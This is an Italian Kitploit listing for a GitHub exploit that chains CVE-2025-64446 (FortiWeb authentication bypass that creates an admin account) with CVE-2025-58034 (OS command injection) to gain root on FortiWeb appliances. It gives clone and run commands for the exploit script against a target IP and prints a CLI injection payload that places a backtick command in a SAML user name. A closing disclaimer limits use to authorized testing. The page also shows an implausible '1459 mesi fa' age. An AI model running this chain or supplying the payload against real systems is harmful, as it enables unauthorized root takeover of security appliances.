Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-64446_CVE-2025-58034 — Exploit di Esecuzione Remota di Codice (RCE) su FortiWeb tramite la catena CVE-2025-64446 + CVE-2025-58034 | Kitploit
Strumenti/GitHubGitHub/lincemorado97/cve-2025-64446_cve-2025-58034
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlApprendimento e FormazioneRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
lincemorado97/cve-2025-64446_cve-2025-58034

CVE-2025-64446_CVE-2025-58034

Exploit di Esecuzione Remota di Codice (RCE) su FortiWeb tramite la catena CVE-2025-64446 + CVE-2025-58034

Vedi Repository
1459 mesi faNon ancora revisionato

Exploit di Esecuzione Remota di Codice (RCE) su FortiWeb tramite la catena CVE-2025-64446 + CVE-2025-58034

Descrizione

Questo script combina due vulnerabilità critiche in Fortinet FortiWeb per ottenere esecuzione remota di codice non autenticata con privilegi di root:

  1. CVE-2025-64446 – Bypass dell'autenticazione tramite Path Traversal relativo
    Permette a un attaccante non autenticato di aggirare l'autenticazione e creare un nuovo account amministrativo.

  2. CVE-2025-58034 – Iniezione di comandi OS autenticata
    Un attaccante autenticato (usando l'account creato al punto 1) può eseguire comandi OS arbitrari come root tramite richieste HTTP appositamente predisposte.

Combinando queste due vulnerabilità, un attaccante può passare da zero accessi al pieno compromesso del sistema senza alcuna credenziale iniziale.

Impatto Finale: Esecuzione Remota di Codice non autenticata (equivalente a shell root)

Dettagli della Vulnerabilità

CVE-2025-64446 – Bypass dell'autenticazione (Path Traversal Relativo)

  • Tipo: Path Traversal relativo che porta al Bypass dell'autenticazione
  • Gravità: Critica (Punteggio Base CVSS 3.1: 9.8)
  • Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Versioni Affette:
    • FortiWeb 8.0.0 – 8.0.1
    • FortiWeb 7.6.0 – 7.6.4
    • FortiWeb 7.4.0 – 7.4.9
    • FortiWeb 7.2.0 – 7.2.11
    • FortiWeb 7.0.0 – 7.0.11

CVE-2025-58034 – Iniezione di Comandi OS autenticata

  • CVE: CVE-2025-58034
  • Tipo: Neutralizzazione impropria di elementi speciali usati in un comando OS (Iniezione di Comandi OS) – [CWE-78]
  • Gravità: Critica
  • Descrizione:
    Un attaccante autenticato può eseguire comandi arbitrari del sistema operativo sul sistema sottostante tramite richieste HTTP o comandi CLI appositamente predisposti.
  • Versioni Affette (estese da questa CVE):
    • FortiWeb 8.0.0 – 8.0.1
    • FortiWeb 7.6.0 – 7.6.5 (nota: include 7.6.5)
    • FortiWeb 7.4.0 – 7.4.10 (nota: include 7.4.10)
    • FortiWeb 7.2.0 – 7.2.11
    • FortiWeb 7.0.0 – 7.0.11

Catena d'Attacco Combinata:

  1. Usa CVE-2025-64446 → Crea un account amministrativo (non autenticato)
  2. Accedi con l'account amministrativo appena creato
  3. Usa CVE-2025-58034 → Esegui comandi OS arbitrari come root

Utilizzo

  1. Clona il repository:

    root@kitploit:~
    git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
    cd CVE-2025-64446_CVE-2025-58034
    
  2. Installa le dipendenze:

    root@kitploit:~
    pip install -r requirements.txt
    
  3. Esegui l'exploit completo (crea admin + esegue comando):

    root@kitploit:~
    python exploit.py <target_ip> [-u <username>] [-p <password>]
    
    • <target_ip>: L'indirizzo IP o hostname dell'appliance FortiWeb vulnerabile. Questo è un argomento obbligatorio.
    • -u <username> (opzionale): Specifica un nome utente personalizzato per l'account amministrativo creato. Se non fornito, verrà utilizzato un UUID.
    • -p <password> (opzionale): Specifica una password personalizzata per l'account amministrativo creato. Se non fornita, il nome utente verrà usato come password.

    Esempio:

    root@kitploit:~
    python exploit.py 192.168.1.100 -u admin123 -p password456
    

    Questo tenterà di creare un account amministrativo con nome utente "admin123" e password "password456" sull'appliance target all'indirizzo 192.168.1.100.

    Se non vengono specificati nome utente e password:

    root@kitploit:~
    python exploit.py 192.168.1.100
    

Dimostrazione

Passo 1: Bypass dell'autenticazione e creazione admin (CVE-2025-64446)

exploit

verification

Passo 2: Esecuzione Remota di Codice come root (CVE-2025-58034)

Dopo aver effettuato l'accesso con il nuovo account amministrativo, un attaccante può sfruttare la vulnerabilità di iniezione di comandi autenticata tramite richieste appositamente predisposte o direttamente tramite la CLI di FortiWeb.

Un metodo affidabile di sfruttamento è utilizzare il seguente comando CLI (eseguito dall'interfaccia a riga di comando di FortiWeb dopo l'autenticazione):

root@kitploit:~
config user saml-user

edit "`<YOUR COMMAND>`"

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

root-shell rce-demo

Verifica

Dopo l'esecuzione:

  • Controlla l'output per i risultati del comando (ad es. uid=0(root) gid=0(root) conferma RCE come root)
  • Accedi via SSH (se hai aggiunto una chiave) o tramite interfaccia web con le credenziali create

Riferimenti

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
  • Advisory PSIRT di Fortinet: https://www.fortinet.com/support/psirt
  • Analisi: https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis

Disclaimer: Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si ha esplicito permesso di test è illegale.

Scarica lo strumento

Lo script genererà un UUID casuale per il nome utente e lo utilizzerà come password.